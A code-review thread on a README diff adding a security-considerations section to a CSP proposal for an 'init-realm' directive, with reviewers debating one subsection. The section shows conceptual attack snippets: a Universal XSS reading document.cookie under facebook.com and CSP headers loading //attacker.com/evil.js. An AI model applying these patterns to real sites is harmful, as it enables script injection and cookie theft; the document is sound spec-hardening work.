README.md

```diff
@@ -239,6 +240,92 @@ This already goes with how CSP is currently enforcing its rules canonically in t
 
+## Consideration
+
+Some important points to consider
+
+### Privacy
+
+There isn't much to take into consideration in regards with privacy.
+
+### Security
+
+Here are some security risks to take into consideration when following this spec for implementation purposes:
+
+#### Universal XSS
+
+Since this proposal focuses on the thin line between same and cross origins, it may put SOP in danger if not implemented correctly.
+
+Since the proposed CSP directive introduces a remote resource to be treated as JavaScript code to execute in all realms that their origin corresponds to the origin of the top most document, if telling same from cross origin goes wrong, the browser may execute the JavaScript code in a cross realm rather than an origin realm, resulting in a Universal XSS effectively.
+
+So if website `attacker.com` finds such a flaw in the implementation, they can easily initiate a Universal XSS against `facebook.com` by taking the following steps:
+
+```html
+<script src="/x.js">
+   // browser got tricked into running RIC script under a cross origin:
+   alert(document.cookie); // will execute under facebook.com
+</script>
+
+<!-- Content-Security-Policy: init-realm: /x.js -->
+
+<html location="//attacker.com">
+<script>
+   createAnIframeThatBypassesRIC({src: '//facebook.com'});
+</script>
+</html>
+```
+
+Therefore, it is crucial to make sure that the check in which it is determined whether the origin is the same as the top most document or not is firm and trustworthy and takes all possible edge cases into account.
+
+While this sounds alarming, since this proposal advises to tap into existing places in which such information is safely determined, it is fair to believe this can be implemented safely just as well.
+
+#### Escalation to Code Execution
+
+From the perspective of an attacker, this proposal can also be thought of as a way to escalate a CSP directive set to full code execution, because of the attacker doesn't find a way to introduce an XSS to the web app, but can somehow control parts of the response's headers, they can translate such capability to an effective XSS using this proposal, by simply configuring a CSP header with the proposed `init-realm` directive pointing to a remote script they control:
+
+```html
+<!-- Content-Security-Policy: init-realm: //attacker.com/evil.js -->
+
+<html location="//example.com">
+</html>
+```
+
+Therefore, it might be important to make sure the address to the remote script resource introduced in the proposed `init-realm` directive properly obeys to other parts of CSP that have the power to mitigate it so attackers won't be able to load them by remote resources the control (e.g. `//attacker.com/evil.js`) nor local ones (e.g. `blob:https://web.app/aa14dc0d-c44c-4072-b918-bff92d26b9b7`):
+
+```html
+<!-- Content-Security-Policy: script-src: 'self'; init-realm: //attacker.com/evil.js -->
+
+<html location="//example.com">
+</html>
+```
+
+#### Integrity of Execution Order
```

Comment:
I don't know if this is really needed. IIUC, it's basically "If this is implemented badly, this would not work". Right?

Reply:
AFAIU, it's more a case of "if this is implemented badly, this would work, but not to the fullest extent expected by this feature".

So, it's not that the RIC code simply won't run, but instead it might run not soon enough, which would introduce a security concern.

And to implementors, this is an important thing to mention, because if they don't take this security consideration into account, they might miss on sinks that would allow attackers to bypass RIC, so to me this feels like a classic security consideration to include in specs.

What do you think?

Reply:
OK, makes sense

Reply:
6266399995dbba835570ce1ac56c6bf722c16279